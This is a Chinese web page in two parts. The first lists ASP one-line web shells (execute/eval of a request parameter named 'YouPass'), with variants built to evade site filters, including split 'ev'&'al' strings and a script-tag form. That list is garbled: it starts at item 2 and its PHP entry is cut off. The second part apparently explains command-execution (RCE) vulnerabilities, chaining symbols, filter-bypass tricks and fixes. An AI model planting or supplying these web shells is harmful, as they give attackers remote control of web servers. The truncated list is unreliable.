eval内容过滤绕过

⑴ 一句话木马及几种可绕过过滤格式

2. <%executerequest("YouPass")%> 袭3. <%execute(request("YouPass"))%>免杀大部分网站的一句话 4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>绕过部分网站过滤<%,%>的一句话 5.<script language=VBScript runat=server>execute request("YouPass")</script>绕过部分网站过滤双引号的一句话 6.<%eval request(YouPass(35))%>php一句话 7.<?>

⑵ 渗透测试——命令执行漏洞（RCE）详解

命令执行漏洞（RCE）是信息安全领域中一种重要的攻击手段，它允许攻击者通过执行不受控制的命令来影响系统或应用的行为。本文旨在深入解析命令执行漏洞的形成原因、利用条件及防范措施。

一、简述命令执行漏洞

1. 形成原因：应用中经常需要调用能够执行系统命令的函数，如 PHP 中的 system、exec、shell_exec 等。当开发者未能严格过滤用户控制的参数时，恶意命令可通过拼接正常命令注入，进而导致命令执行攻击。

2. 漏洞分类：

• 代码层过滤不严：商业应用的核心代码在调用系统命令时，如 PHP 的 system 函数，若参数过滤不严，可能导致攻击。


• 系统漏洞：如 bash 的破壳漏洞（CVE-2014-6271）等，利用系统自身存在的安全漏洞执行命令。


• 第三方组件漏洞：调用存在代码执行漏洞的第三方组件，如 WordPress 中的 imageMagick 组件、Java 的 Struts2 或 ElasticsearchGroovy 等。

二、利用条件

要利用命令执行漏洞，需满足以下条件：

• 应用调用了能够执行系统命令的函数。


• 函数参数可控，即用户可影响参数内容。


• 开发者对参数过滤不严或过滤不充分。

绕过能力的评判取决于攻击者的技术水平，绕过方式将在后续章节中介绍。

三、可能存在命令执行漏洞的函数（PHP）

1. 利用系统函数实现命令执行的函数：如 eval、assert、preg_replace、call_user_func 等，如果对用户输入未严格过滤，可能引发远程命令执行。
2. 直接执行系统命令的代码函数：system、exec、shell_exec、passthru 等，需注意参数安全。

四、命令拼接符号

命令执行漏洞的关键在于命令拼接，恶意命令通常拼接在正常命令后，掌握拼接符号是基础。以下是常用符号及示例：

• &:使命令后台运行。如：command &，可以同时运行多个后台命令。


• ;:命令分隔符，实现无关联的命令执行，每条命令互不影响。


• &&:左边命令成功执行后执行右边命令。


• ||:前面命令失败时执行后面命令。


• ():组合多个命令，先执行括号内的命令。

五、常见绕过防护的方法

1. 通配符：如使用通配符替代命令中的关键字符，可绕过部分安全限制。
2. 连接符：如使用引号、反斜杠等来规避安全检查。
3. 未初始化变量：利用未初始化的变量值为 null，插入命令末尾，绕过黑名单检测。

六、常见位置

命令执行漏洞最常出现在 CMS 框架、插件及应用的其他关键位置，这些地方往往需要执行系统命令。

七、修复方案

1. 升级框架、插件等至最新版本，打上安全补丁。
2. 关注行业动态，及时修复漏洞。
3. 减少框架/CMS 的使用。
4. 过滤危险符号，减少风险。
5. 安全配置 PHP 相关参数，禁用执行命令的函数。
6. 升级中间件。
7. 严格控制传入变量，避免使用危险的魔法函数。

通过上述方法，开发者可有效防范命令执行漏洞，提升系统安全性。